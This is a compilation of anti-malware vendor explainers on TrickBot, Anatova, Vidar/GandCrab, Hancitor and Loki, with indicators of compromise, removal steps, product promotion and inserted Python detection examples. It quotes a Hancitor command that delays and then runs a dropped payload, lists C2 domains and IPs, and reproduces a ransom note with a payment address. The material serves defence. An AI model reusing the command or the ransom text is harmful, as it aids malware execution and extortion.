TrickBot

TrickBot is once again making itself known during tax season and attempting to steal your hard-earned money. TrickBot was originally discovered in October of 2016 but has since changed and evolved dramatically into one of the most prolific attacks today.

How it works

Just like Emotet, TrickBot primarily spreads through specially designed emails, or malspam, that attempt to trick the user into clicking a link or downloading the attachment. The current campaign, as of this writing, is TrickBot’s normal tax season attack: pretending to be the IRS. In the example below, the link will send you to a domain that looks official but is slightly misspelled.

Once TrickBot is installed on a computer, it sets up a scheduled task to make sure it has a persistent presence on the computer before starting to steal information. In addition, it disables Windows Defender early on so that it won’t be removed. SUPERAntiSpyware is not stopped in this way.

TrickBot does not show any signs of running on a user’s computer and the only “noise” it makes is the network traffic it creates. Recording network traffic is generally only done by businesses, which helps TrickBot evade detection on personal computers.

TrickBot uses a modular design, much like Emotet and other bankers. Not only does this allow TrickBot to quickly change its attack capabilities, but it also makes it harder to detect. These modules often do one thing well rather than trying to do many things. Some are designed to go after hosted FTP servers, cached remote desktop credentials, and bitcoin mining accounts.

The most common module, however, allows TrickBot to redirect the user to fake bank sites that, instead of logging the user in, will steal account credentials. The scammers make this possible by domain squatting, or registering an internet address that is only slightly different than the one you intend to visit. For instance, if you receive an email about your GoDaddy account, you might not notice if a link in that email goes to godabdy.com/payyourbill  (godaddy is misspelled with a b instead of the second d).

This is compounded by hiding the URL, so only the studious will look for it, and by making the site look like what you expect through careful recreation by the attackers. Many big companies attempt to combat this by buying these fake domains and redirecting them to the appropriate domain, but this is not always easily done.
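The squatted-domain trick above (godabdy.com standing in for godaddy.com, or a misspelled IRS domain) can be caught before anyone clicks. The following is an added example, not code from SUPERAntiSpyware or from this writeup: it pulls the links out of a message body and compares each link's registrable domain against a list of brands the mailbox expects mail from. The brand list, the sample message and the two-edit threshold are my assumptions; the godabdy.com link is the page's own example.

```python
import re
from urllib.parse import urlparse

# Brand domains this mailbox legitimately receives links for (constructed list).
EXPECTED_DOMAINS = {"godaddy.com", "irs.gov", "superantispyware.com"}


def registrable_domain(hostname: str) -> str:
    """Last two labels of a hostname. Good enough for .com/.gov; a production tool
    would consult the public suffix list so that e.g. co.uk is handled."""
    labels = hostname.lower().strip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else hostname.lower()


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance by dynamic programming (one row kept at a time)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_link(url: str, max_distance: int = 2) -> str:
    """Classify one URL against the expected brands:
      'expected'               - registrable domain is one we trust
      'lookalike:<brand>'      - within max_distance edits of a brand (godabdy.com)
      'brand-as-subdomain:<b>' - brand name used as a subdomain of a stranger's domain
      'unknown'                - none of the above; still worth hovering over"""
    host = (urlparse(url).hostname or "").lower()
    domain = registrable_domain(host)
    if domain in EXPECTED_DOMAINS:
        return "expected"
    for brand in sorted(EXPECTED_DOMAINS):
        if edit_distance(domain, brand) <= max_distance:
            return "lookalike:" + brand
    for brand in sorted(EXPECTED_DOMAINS):
        if brand.split(".")[0] in host.split(".")[:-2]:
            return "brand-as-subdomain:" + brand
    return "unknown"


def extract_links(email_text: str) -> list:
    """Pull http(s) URLs out of a message body."""
    return re.findall(r"https?://[^\s<>\"']+", email_text)


# Constructed sample message body; the godabdy.com link is the page's own example.
SAMPLE_EMAIL = """Your GoDaddy bill is overdue. Pay now at http://godabdy.com/payyourbill
Questions? Visit https://www.godaddy.com/help
Your refund is ready: http://irs.gov.secure-refund.com/login"""


def triage_email(email_text: str) -> dict:
    return {url: classify_link(url) for url in extract_links(email_text)}


if __name__ == "__main__":
    for url, verdict in triage_email(SAMPLE_EMAIL).items():
        print(f"{verdict:32} {url}")
```

A link that scores "unknown" is not cleared; it simply is not a near-miss of a brand you listed, which is exactly the case where hovering over the link and reading the address matters.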

Who is affected?

TrickBot is aimed more at businesses than casual users; however, it is still the number-one banker, and anyone who lives in the USA, Africa, Europe, or the Middle East should be wary. (This does not exclude other areas from being hit; it just shows that they are not the current target.)

Indicators of Compromise

  1. C:\Documents and Settings\<USER>\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1275210071-920026266-1060284298-1003\8c8436195f6e0875edb85e34665c32ec_fabbc6a1-c573-4ea0-9ca1-50004b35a440
  2. C:\d2cc298a90c6ef939488b53ead12fd3549c3c0414733f6fdaf1762da31ea1e90
  3. sha256: d2cc298a90c6ef939488b53ead12fd3549c3c0414733f6fdaf1762da31ea1e90
  4. sha1: df404c6b1efc2cfbfdd0b7699554989dab03791f
  5. md5: e580ca34929cf9b62e816adcebe715f2
  6. C:\Users\admin\AppData\Roaming\msscsc\e690ca34929cf9b72e917adcebe816f2.exe
  7. d2cc298a90c6ef939488b53ead12fd3549c3c0414733f6fdaf1762da31ea1e90
  8. http://ip.anysrc.net/plain/clientip
  9. Scheduled Task that points to a file in AppData such as C:\Users\<User>\AppData\Roaming\
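Indicator 9, a scheduled task whose action lives under a user's AppData folder, is the one on this list a technician can check quickly on any Windows machine. The example below is added here and is not SUPERAntiSpyware's code: it parses the CSV that `schtasks /query /fo CSV /v` emits and flags every task whose "Task To Run" path runs out of AppData\Roaming or AppData\Local. The CSV excerpt is constructed (the real command prints many more columns, but the column names used are the real ones); the task names are made up, and the .exe path under msscsc is indicator 6 from the list above.

```python
import csv
import io
import re

# Constructed excerpt of `schtasks /query /fo CSV /v` output. The real command
# emits many more columns; the column names used here are the real ones. Task
# names are made up; the third action path is the TrickBot indicator from the
# list above.
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Status","Author","Task To Run"
"PC01","\Microsoft\Windows\Defrag\ScheduledDefrag","Ready","Microsoft Corporation","%windir%\system32\defrag.exe -c -h -o -$"
"PC01","\ConstructedTask1","Ready","PC01\admin","C:\Users\admin\AppData\Roaming\msscsc\e690ca34929cf9b72e917adcebe816f2.exe"
"PC01","\ConstructedTask2","Ready","PC01\admin","cmd.exe /c C:\Users\admin\AppData\Local\Temp\6.pif"
'''

# Actions that execute anything out of a user's AppData tree. Legitimate
# per-user installers (some updaters) also live there, so review hits by hand.
USER_PROFILE_EXEC = re.compile(r"\\AppData\\(Roaming|Local)\\", re.IGNORECASE)


def parse_schtasks_csv(text: str) -> list:
    """Rows as dicts keyed by column name. Some Windows builds repeat the header
    row before every task in verbose mode, so those repeats are dropped."""
    rows = csv.DictReader(io.StringIO(text))
    return [r for r in rows if r.get("TaskName") != "TaskName"]


def suspicious_tasks(text: str) -> list:
    """(task name, action) for every task whose action runs from AppData."""
    hits = []
    for row in parse_schtasks_csv(text):
        action = row.get("Task To Run", "") or ""
        if USER_PROFILE_EXEC.search(action):
            hits.append((row["TaskName"], action))
    return hits


if __name__ == "__main__":
    # On a live system: schtasks /query /fo CSV /v > tasks.csv, then read tasks.csv here.
    for name, action in suspicious_tasks(SAMPLE_SCHTASKS_CSV):
        print(f"{name}: {action}")
```

Run the schtasks command from an elevated prompt so that tasks registered by other accounts are included; a task created by the infected user will otherwise still show, but system-wide ones may not.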

What you can do


If you or someone you know is infected with TrickBot malware, download SUPERAntiSpyware Professional right now and get a 14 day free trial, no credit card required.  SUPERAntiSpyware is easy to install and will detect and remove TrickBot from any Windows computer. If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech04 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

Anatova

Anatova is the nickname given to a new brand of sophisticated ransomware that looks to encrypt your personal or business files and then demands payment to decipher them.

How it works

Anatova is distributed through peer-to-peer (P2P) file sharing networks. It masquerades as genuine software, often using real icons to fool users into believing it is authentic. Once you run the malicious file, it begins to encrypt your personal documents, after which it will demand you send payment to regain access to your files.

This can be extremely hazardous for larger organizations, since Anatova can affect files across local networks. This ransomware is designed to encrypt your files quickly to avoid detection. It fully encrypts files that are less than 1 Megabyte, and encrypts only a single Megabyte of files larger than that. Even though the larger files are not completely encrypted, enough damage has been done that they are, most likely, no longer usable.

Another fascinating thing about Anatova is its resistance to analysis. It encrypts most of its internal strings, cleans its own data out of memory, causes bugs in common analysis programs, and stops execution if it detects that it is in a virtual or test environment.

One of the most dangerous aspects of Anatova is the fact that it is built to be modular. This means that it was designed to have new features added to it at any time. Instead of just encrypting your files, future versions of Anatova could steal your personal info and passwords, add your computer to a malicious botnet, or a multitude of other things.

Who is affected

Due to its current distribution method, most people who do not use peer-to-peer file sharing should be safe from this threat. If you do happen to use P2P file sharing, we strongly suggest you scan every file you download before opening it, both with SUPERAntiSpyware and VirusTotal.

The majority of Anatova detections have been in the United States, although infections have been seen across Europe as well. This malware checks your system language and refuses to run in several countries such as Iraq, India, and the Commonwealth of Independent States.

Indicators of compromise

Generally one of the biggest indicators of a ransomware attack is the changed extensions on the encrypted files. This ransomware, however, does not alter the file extensions, which makes casual detection of an Anatova infection more difficult.
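Because Anatova keeps the original filename and extension, the usual "look for a strange extension" check finds nothing. What does change is the content of the first megabyte, which is where every common document format keeps its signature bytes. The example below is added here and is not SUPERAntiSpyware's code: it checks whether a file's leading bytes still match what its extension promises, and falls back to an entropy measurement for extensions it has no signature for. The signature table, the 7.5 bits/byte threshold and the sample files are my assumptions.

```python
import math
from collections import Counter

# Leading bytes a well-formed file of each type starts with (assumed signatures).
MAGIC = {
    ".pdf": (b"%PDF",),
    ".docx": (b"PK\x03\x04",), ".xlsx": (b"PK\x03\x04",), ".zip": (b"PK\x03\x04",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
SAMPLE_WINDOW = 1024 * 1024        # Anatova touches at most the first megabyte
HIGH_ENTROPY = 7.5                 # bits per byte; random-looking data sits near 8.0


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def assess_file(name: str, data: bytes):
    """Return (verdict, entropy of the first MiB).
    'header-mismatch': the extension promises a signature the bytes lack; for an
                       unchanged filename that is the strongest sign of in-place encryption.
    'high-entropy':    no signature known for this extension, but the first MiB looks
                       random; expect false positives on archives and media files.
    'ok':              nothing suspicious."""
    ext = ("." + name.rsplit(".", 1)[1].lower()) if "." in name else ""
    head = data[:SAMPLE_WINDOW]
    ent = shannon_entropy(head)
    if ext in MAGIC and not any(head.startswith(sig) for sig in MAGIC[ext]):
        return "header-mismatch", ent
    if ext not in MAGIC and ent > HIGH_ENTROPY:
        return "high-entropy", ent
    return "ok", ent


def build_sample_files() -> dict:
    """Constructed inputs: two intact files and two encrypted-in-place stand-ins.
    bytes(range(256)) * 16 has every byte value equally often (entropy exactly 8.0),
    which is what a ciphertext prefix looks like to this check."""
    cipher = bytes(range(256)) * 16
    return {
        "report.pdf": b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog >>\nendobj\n" * 50,
        "notes.txt": b"meeting notes: review the quarterly numbers\n" * 50,
        "invoice.pdf": cipher,
        "todo.txt": cipher,
    }


def scan(files: dict) -> dict:
    return {name: assess_file(name, data)[0] for name, data in files.items()}


if __name__ == "__main__":
    for name, verdict in scan(build_sample_files()).items():
        print(f"{verdict:16} {name}")
```

Only the first megabyte is read, which is also why the check works for Anatova's partially encrypted large files: the signature sits in the part that was overwritten.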

A better indicator is the ransom note that this malware leaves behind. Anatova will drop a text file into each folder where it has encrypted a file. This text file gives instructions on how to pay the ransom to get your files unlocked:

All your files are crypted. Only us can decrypt your files, you need to pay 10 DASH in the address:

XnzvWQKv22uPDCYcuGebyoaVinekkJicbK

After the payment send us the address used to make the payment to one of these mail addresses:

anatova2@tutanota.com

anatoday@tutanota.com

Later wait for our reply with your decryptor. If you want to send us ONE JPG FILE ONLY max 200kb to decrypt per free before of payment

Don’t try fuck us, in this case you NEVER will recover your files. Nothing personal, only business.

Send this file untouched with your payment or/and free file!

—KEY—

<random key>

—KEY—

What you can do

SUPERAntiSpyware detects many variants of Anatova; however, new versions are being created all the time so make sure to always update to the latest database version. Also, upgrading to Real-Time protection will dramatically increase your level of protection from this threat.

Refraining from using Anatova’s primary infection vector — peer-to-peer file sharing services — should effectively keep your system safe from this infection. As stated before, if you do use P2P file sharing services, you must be extremely careful with what you download. Make sure to scan every file with SUPERAntiSpyware and VirusTotal to ensure it is safe before opening it.

How To Remove Anatova

  1. Using an uninfected system, search the internet for a decryptor for your particular version of Anatova and copy it to a USB drive — I would suggest starting your search with No More Ransom.
  2. Restart the infected computer in Safe Mode with Networking.
  3. Insert the USB drive with the decryptor, copy it to the desktop, then eject and remove the drive.
  4. Run the decryptor.
  5. Assuming the decryptor is successful, update your SUPERAntiSpyware to the latest database version and run a complete scan to remove any traces of Anatova from your system.
  6. If the decryptor does not work, you can take your computer to a data recovery expert.

How To Remove Vidar/GandCrab

Vidar is a relatively new keylogging, data-stealing malware campaign. It is generally distributed through malicious advertisements on less-than-reputable sites such as BitTorrent or free video streaming sites. These malvertisements redirect their victims to various exploit kits such as Fallout and GrandSoft, which in turn will infect your machine with various malevolent payloads such as Vidar.

How it works

Vidar is sold or rented as a service to the blackhats. For the low price of $700 they are able to utilize Vidar’s distribution system to spread their own malware. They can even customize it to steal a variety of your sensitive data such as browser history, website logins, credit card numbers, and cryptocurrency wallets.

One of the more common payloads is the ransomware called GandCrab. Ransomware is exactly what it sounds like – it encrypts your files and demands payment in order to decrypt them. SUPERAntiSpyware detects many variants of the GandCrab ransomware. Our researchers are hard at work daily to detect more variants and help combat this threat.

Unfortunately once your system becomes infected with ransomware like GandCrab, there are few options for you. You can either pay the ransom and hope they unlock your files, or you may get lucky and find that a decryptor has been created. Currently there are decryptors for some versions of GandCrab (V1, V4, and V5). It is worth noting that these decryptors, while definitely helpful, do not always work perfectly for all encrypted files. The final option is less appealing – wipe your system and reinstall Windows. The upside is that you should be able to use your computer again without paying. The downside is that you will have lost all your documents.

Our suggestion to protect yourself from ransomware is relatively simple: Back up your files. Being able to restore your important documents from a cloud or local backup is the best way to thwart a ransomware attack. Keeping your system up to date with software patches is also something we recommend to help protect yourself.

Who is affected

Due to the way it is distributed, Vidar does not target individuals or businesses directly. It relies on people clicking on their malicious advertisements. In general, you should avoid clicking ads online, no matter how enticing. Something interesting about GandCrab is that it has been known to check if you have a Russian keyboard layout, and if so it terminates its execution immediately.

Indicators of compromise

Vidar itself is very stealthy, doing its data thievery quickly and silently in the background. It’s very likely that you won’t even know that Vidar has hit you until it drops its payload. Vidar drops some text files onto your system into ProgramData\(random string)\ and ProgramData\(random string)\files\. These files contain passwords and other information that Vidar has stolen. There may also be a zipped file containing copies of these text files.

The most common malware delivered by Vidar has been GandCrab ransomware. Within a minute or so, GandCrab will change your Windows background to something similar to this:

There will be an HTML or text file called (random)-DECRYPT dropped into every folder where files have been encrypted by GandCrab, containing instructions on how to pay the ransom to get your documents back. You will also notice that the encrypted files will have their extension changed to something random instead of the correct extension:
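The two GandCrab indicators just described, a (random)-DECRYPT note in every affected folder and a random extension appended to the encrypted files, can be turned into a triage pass over a directory listing. This is an added example, not SUPERAntiSpyware's code: the listing, the ".kqxzr" extension and the KQXZR-DECRYPT note names are constructed to stand in for the random values GandCrab picks. It reports, per folder that holds a note, which extension was appended and to how many files, which is the information you need when looking up a decryptor.

```python
import ntpath
import re
from collections import Counter, defaultdict

# GandCrab's note is named <random>-DECRYPT.txt or .html (see above).
NOTE_NAME = re.compile(r"^[A-Za-z0-9]+-DECRYPT\.(?:txt|html)$", re.IGNORECASE)

# Constructed listing of a victim's profile, as a recursive directory walk would
# return it. The ".kqxzr" extension and the KQXZR-DECRYPT notes are made up to
# stand in for the random values GandCrab picks.
SAMPLE_LISTING = [
    r"C:\Users\admin\Documents\budget.xlsx.kqxzr",
    r"C:\Users\admin\Documents\letter.docx.kqxzr",
    r"C:\Users\admin\Documents\KQXZR-DECRYPT.txt",
    r"C:\Users\admin\Pictures\holiday.jpg.kqxzr",
    r"C:\Users\admin\Pictures\KQXZR-DECRYPT.html",
    r"C:\Users\admin\Downloads\setup.exe",
    r"C:\Users\admin\Downloads\readme.txt",
]


def find_ransom_notes(paths):
    return [p for p in paths if NOTE_NAME.match(ntpath.basename(p))]


def triage(paths):
    """Per folder that holds a ransom note: the note names, the most common
    extension among the other files (the appended one), and how many files
    carry it. Folders without a note are skipped."""
    by_dir = defaultdict(list)
    for p in paths:
        by_dir[ntpath.dirname(p)].append(ntpath.basename(p))
    report = {}
    for folder, names in by_dir.items():
        notes = [n for n in names if NOTE_NAME.match(n)]
        if not notes:
            continue
        others = [n for n in names if not NOTE_NAME.match(n)]
        exts = Counter(ntpath.splitext(n)[1].lower() for n in others)
        ext, count = exts.most_common(1)[0] if exts else ("", 0)
        report[folder] = {"notes": notes, "extension": ext, "files": count}
    return report


def appended_extensions(report):
    """The set of extensions the ransomware appended; useful when looking up a decryptor."""
    return {v["extension"] for v in report.values() if v["extension"]}


def original_name(encrypted_name, appended_ext):
    """Strip the appended extension to recover the pre-encryption filename."""
    if encrypted_name.lower().endswith(appended_ext):
        return encrypted_name[: -len(appended_ext)]
    return encrypted_name


if __name__ == "__main__":
    report = triage(SAMPLE_LISTING)
    for folder, info in report.items():
        print(folder, info)
    print("appended:", appended_extensions(report))
```

On a real machine feed it the output of a recursive walk (os.walk from a clean boot, or a listing taken from the drive mounted on an uninfected system); the note text, not the filename, is what tells you the GandCrab version.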

Here is a list of file types that may be targeted for encryption by GandCrab:

.sql, .mp4, .7z, .rar, .m4a, .wma, .avi, .wmv, .csv, .d3dbsp, .zip, .sie, .sum, .ibank, .t13, .t12, .qdf, .gdb, .tax, .pkpass, .bc6, .bc7, .bkp, .qic, .bkf, .sidn, .sidd, .mddata, .itl, .itdb, .icxs, .hvpl, .hplg, .hkdb, .mdbackup, .syncdb, .gho, .cas, .svg, .map, .wmo, .itm, .sb, .fos, .mov, .vdf, .ztmp, .sis, .sid, .ncf, .menu, .layout, .dmp, .blob, .esm, .vcf, .vtf, .dazip, .fpk, .mlx, .kf, .iwd, .vpk, .tor, .psk, .rim, .w3x, .fsh, .ntl, .arch00, .lvl, .snx, .cfr, .ff, .vpp_pc, .lrf, .m2, .mcmeta, .vfs0, .mpqge, .kdb, .db0, .dba, .rofl, .hkx, .bar, .upk, .das, .iwi, .litemod, .asset, .forge, .ltx, .bsa, .apk, .re4, .sav, .lbf, .slm, .bik, .epk, .rgss3a, .pak, .big, wallet, .wotreplay, .xxx, .desc, .py, .m3u, .flv, .js, .css, .rb, .png, .jpeg, .txt, .p7c, .p7b, .p12, .pfx, .pem, .crt, .cer, .der, .x3f, .srw, .pef, .ptx, .r3d, .rw2, .rwl, .raw, .raf, .orf, .nrw, .mrwref, .mef, .erf, .kdc, .dcr, .cr2, .crw, .bay, .sr2, .srf, .arw, .3fr, .dng, .jpe, .jpg, .cdr, .indd, .ai, .eps, .pdf, .pdd, .psd, .dbf, .mdf, .wb2, .rtf, .wpd, .dxg, .xf, .dwg, .pst, .accdb, .mdb, .pptm, .pptx, .ppt, .xlk, .xlsb, .xlsm, .xlsx, .xls, .wps, .docm, .docx, .doc, .odb, .odc, .odm, .odp, .ods, .odt

What you can do

SUPERAntiSpyware detects many variants of Vidar, however new versions are being created all the time so make sure to always update to the latest database version. Also, upgrading to Real-Time protection will dramatically increase your level of protection from this threat.

Installing an Ad Blocker on your computer can help stop Vidar at its source, however one of the best practices is to refrain from clicking on any advertisements online.

If your files have been encrypted by GandCrab, you may still be able to decrypt them. Various companies and individuals create ransomware decryptors and release them on the internet. These decryptors are specifically designed to unlock files that were encrypted with a particular version of ransomware, so make sure to note the version of GandCrab when looking for a decryptor – the version we were infected with was 5.0.4. No More Ransom is a repository of most of the decryptors available and is always being updated.

If you are not able to find a decryptor that works, SUPERAntiSpyware suggests that you do not pay the ransom. There is no guarantee that the blackhats will unlock your files once they receive your payment. In 2018 it was reported that paying the ransom actually gets your files decrypted less than 50% of the time. If your data is extremely crucial, we suggest you contact a company who specializes in data recovery services.

HOW TO REMOVE Vidar/GandCrab

  1. Using an uninfected system, search the internet for a decryptor for your particular version of GandCrab and copy it to a USB drive – I would suggest starting with No More Ransom
  2. Restart the infected computer in Safe Mode with Networking
  3. Insert the USB drive with the decryptor, copy it to the desktop, then eject and remove the drive
  4. Run the decryptor
  5. Assuming the decryptor is successful, update your SUPERAntiSpyware to the latest database version and run a complete scan to remove any traces of Vidar from your system
  6. If the decryptor does not work, you can take your computer to a data recovery expert

How to remove Hancitor

Hancitor, also known as Chanitor, is known for dropping its payloads rather than downloading them post-infection, as well as for a unique phishing approach to trick users into downloading and activating Microsoft Word documents with malicious macros.

How it works

Hancitor uses a new template that attempts to fool the user into believing that it is a FedEx tracking number. There is no attachment, however; instead, the tracking number link directs the user to the sjkfishfinders[.]com domain and then downloads the Word document. Once downloaded, the Word file attempts to trick the user into allowing macros, which would trigger code residing inside the file. An example can be seen below:

The lack of an attachment, often seen as a red flag by many users, may lure the user into a false sense of security. It is important to be careful about which links you click: on most modern web browsers, hovering your mouse pointer over the link will tell you where the link will lead to. If you do not know the address, then it is safer to avoid following the link.

When a user enables the macro, rather than downloading the application from the internet, the application is instead extracted from inside the document and dropped in the hidden folder \AppData\Local. Before finishing, the script launches the command cmd.exe /c ping localhost -n 100 && C:\Users\admin\AppData\Local\Temp\6.pif. Ping is used to delay the attack and avoid automated detection by waiting approximately 100 seconds before running the dropped application 6.pif. 6.pif then reaches out to a C&C server before downloading new malware or running commands.

In addition to 6.pif, another file is dropped at C:\Users\admin\AppData\Local\Temp\6fsdFfa.com. This executable is a banker. Immediately after being run, it reaches out to api.ipify.org, which returns the victim’s public IP address. It then attempts to submit several unique values and the IP address in plain text to a list of infected servers. If the infected servers reply back indicating that they are available to receive the data, the program will begin compiling all the usernames and passwords it can obtain and submit them to the server.
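The ping-as-sleep trick is visible in process-creation telemetry, and it is the chaining that gives it away: a long ping loop followed by `&&` and an executable under a Temp folder. The example below is added here and is not SUPERAntiSpyware's code: it scores constructed process-creation log lines (Sysmon-style "CommandLine=" fields, made up for this example) against that pattern. The first sample line is the command quoted above; the scoring weights are my assumption.

```python
import re

# A ping delay: "ping <host> -n <count>" or "ping -n <count> <host>", chained with &&.
PING_DELAY = re.compile(
    r"ping(?:\.exe)?\s+(?:-n\s+(?P<c1>\d+)\s+(?P<t1>\S+)|(?P<t2>\S+)\s+-n\s+(?P<c2>\d+))"
    r'[^&"]*&&\s*(?P<then>[^"]+)',
    re.IGNORECASE,
)
# The chained command executes something out of the user's Temp folder.
TEMP_EXEC = re.compile(r"\\AppData\\Local\\Temp\\[^\s\"]+\.(?:pif|exe|com|scr)\b", re.IGNORECASE)

# Constructed process-creation records. Line 1 repeats the Hancitor command from
# the text; lines 2 and 3 are benign uses of ping an admin might see.
SAMPLE_LOG = [
    r'EventID=1 Image=C:\Windows\System32\cmd.exe CommandLine="cmd.exe /c ping localhost -n 100 && C:\Users\admin\AppData\Local\Temp\6.pif"',
    r'EventID=1 Image=C:\Windows\System32\cmd.exe CommandLine="cmd.exe /c ping -n 2 fileserver && robocopy \\fileserver\share D:\backup"',
    r'EventID=1 Image=C:\Windows\System32\PING.EXE CommandLine="ping -n 4 8.8.8.8"',
]


def analyze(line: str):
    """None when the line has no ping-then-run chain; otherwise a dict with the
    implied delay (one echo per second by default), the chained command, a score
    and the reasons behind it."""
    m = PING_DELAY.search(line)
    if not m:
        return None
    count = int(m.group("c1") or m.group("c2"))
    then = m.group("then").strip()
    score, reasons = 0, []
    if count >= 30:
        score += 1
        reasons.append(f"ping loop delays execution by roughly {count} seconds")
    if TEMP_EXEC.search(then):
        score += 2
        reasons.append("chained command runs from AppData\\Local\\Temp")
    return {"delay_seconds": count, "next_command": then, "score": score, "reasons": reasons}


def suspicious(lines, threshold: int = 2) -> list:
    return [a for a in (analyze(l) for l in lines) if a and a["score"] >= threshold]


if __name__ == "__main__":
    for hit in suspicious(SAMPLE_LOG):
        print(hit)
```

A short ping before a file copy (line 2) is normal operator behaviour and scores zero; it is the combination of a long delay and a Temp-folder executable that reaches the threshold.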

Other templates have been used by Hancitor in the past, including but not limited to divorce papers, parking tickets, and FTC claims. As always, it’s important to have Microsoft Office macros disabled unless required by your job.

Who is affected?

Anyone with an email address can become a target of this mal-spam campaign. While it does not use victims’ email addresses like Emotet does, Hancitor’s unique templates are meant to catch even savvy users off guard, regardless of whether the email is used for work or is a personal email.

Indicators of Compromise

  1. cmd.exe /c ping localhost -n 100 && C:\Users\admin\AppData\Local\Temp\6.pif
  2. sha256: 76b96c8d796cfcebff34d42e65e5a4ab2770fda42ea3c259097ee068660dfcc2
  3. md5: 4d4e366b0813148f12fa1a2638c43f72
  4. C:\Users\admin\AppData\Local\Temp\6fsdFfa.com
  5. Felighevengna[.]com
  6. api.ipify.org
  7. verrestofred[.]ru
  8. 81.171.7.39
  9. 54.204.36.156
  10. 95.169.184.23
  11. felighevengna.com/4/forum[.]php
  12. verrestofred.ru/4/forum[.]php

What you can do


If you or someone you know is infected with Hancitor malware download SUPERAntiSpyware Professional right now and get a 14-day free trial, no credit card required.  SUPERAntiSpyware is easy to install and will detect and remove Hancitor from any Windows computer.

If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech04 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

How To Remove Hancitor

  1. Restart the infected computer in safe mode without networking.
  2. Search through the items in the Indicators of Compromise section above and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
  3. Delete files and folders that have been confirmed as malware.
  4. Repeat steps 1-3 on all other machines in the network.
  5. Restore all infected computers to normal mode only after confirming the infection is removed.

Definitions

Attack Vector: The way an attacker gains access to a target. The most common of these are malicious emails, but many more exist and new ones are discovered all the time.

BackDoor: A bypass allowing a malicious user to connect to the target machine without permission from the target. These can take the form of default usernames and passwords baked into the machine or a malicious download that opened a connection for the malicious user.

BlackHat: A term referring to a hacker who hacks for personal gain. The term comes from old western movies, where the good guy would wear a white hat and the bad guys would wear a black hat.

Banker: Refers to a malicious file that attempts to steal bank information from the user.

Domain squatting/cybersquatting: Refers to holding, or squatting on, a misspelled or visually similar web address to trick victims into visiting and trusting the site.

Downloader: Refers to software that maliciously downloads another file from the internet and then executes it.

Dropper: Refers to software that has a malicious file residing inside of it, which is extracted and then run.

Keylogger: A piece of software designed to record every key pressed on your keyboard, mostly used to steal your usernames and passwords.

Mal-Spam: (malicious spam) A technique used by attackers where they send out emails pretending to be something you would expect to receive. This is a very common attack.

Ransomware: A type of malware which encrypts your files, effectively holding your documents hostage until you pay to get them unlocked.

Supply Chain Attack: An attack vector in which malicious attackers gain access to trusted software and inject their own code inside of it, allowing them to bypass many security checks.

How to remove Loki

Delivered through malicious spam campaigns, Loki focuses on stealing credentials off the victim computer and runs a keylogger. Loki also communicates back to a Command and Control server (C&C) to report what it finds and to receive commands if needed.

How it works

Loki, named after the creator’s username Lokistov, is delivered to users through a variety of channels, but the most common is malicious emails that can come in a variety of types. The most common strategy is the familiar “invoice” style email that attempts to get the potential victim to open the attachment. Once opened, the “invoice” will try to run embedded macros or get the user to follow a link to a downloader. One example of such an “invoice” can be found below.

[Image: sample “invoice” document prompting the user to click Enable Content]

If the potential victim were to click “Enable Content,” Loki would be installed and start gathering data. This is a common attack vector and was used, albeit in a more complex way, by Emotet.

This is not the only way Loki can be delivered, however. Because it can be purchased by any malicious user, Loki will be delivered in whatever way is most cost effective for that buyer.

Loki focuses primarily on credential stealing and boasts an impressive 80 programs it has the ability to steal from, the most notable being all major browsers, including:

  • Google Chrome
  • Mozilla Firefox
  • Microsoft Edge
  • Microsoft Internet Explorer
  • Opera Software’s Opera browser

In addition to this already worrying list, Loki is able to go after many alternative versions of these browsers such as:

  • 8pecxstudio’s variant of Firefox, Cyberfox
  • Google’s open-source browser Chromium
  • Independently developed Firefox fork, WaterFox
  • Nichrome

In addition to browsers, Loki can go after FTP clients, Microsoft Outlook, and independently developed SuperPuTTY. This list will likely be expanded in future campaigns to include more commonly used programs if vulnerabilities are found.

After connecting and confirming the presence of its C&C server, Loki launches a keylogger in a separate thread. This keylogger records every button press of the keyboard during its operation and can be used to reveal other passwords and usernames that may not have been stored in a program it can access. This is then bundled with any other data it retrieved.

Once the data is gathered, it is compressed and sent to the C&C server hosted by the malicious actor. These servers are normally shut down quickly after a new campaign has been identified, but they can remain active for days or weeks at a time, giving the attackers plenty of time to store the gathered data somewhere else and sell it.

Who is affected?

Loki can be bought on the dark web fairly cheaply. The last known price at the time of this writing was $70. The consequence of this is that Loki can be used to target anyone. The benefit of this availability is that it makes it much easier for anti-malware companies to stop it.

Indicators of Compromise

  1. C:\Users\admin\AppData\Local\Temp\saver.scr
  2. a.doko.moe
  3. MD5: 500F84B83BE685009C136A67690CA0C3

What you can do


If you or someone you know is infected with the Loki malware download SUPERAntiSpyware Professional right now and get a 14 day free trial, no credit card required.  SUPERAntiSpyware is easy to install and will detect and remove Loki from any Windows computer.

If you are a Computer Technician, you may like to try our SUPERAntiSpyware Tech Edition solution, now free for the next 30 days. Use Tech03 as the Tech ID.  Click here: https://www.superantispyware.com/technician-download.html

How To Remove Loki

  1. Restart the infected computer in safe mode without networking.
  2. Search through the items in the Indicators of Compromise section above and investigate any files/folders you do not recognize. You can run the file through SUPERAntiSpyware or online through VirusTotal.com to confirm that it is malware.
  3. Delete files and folders that have been confirmed as malware.
  4. Repeat steps 1-3 on all other machines in the network.
  5. Restore all infected computers to normal mode only after confirming the infection is removed.

How to remove ServHelper

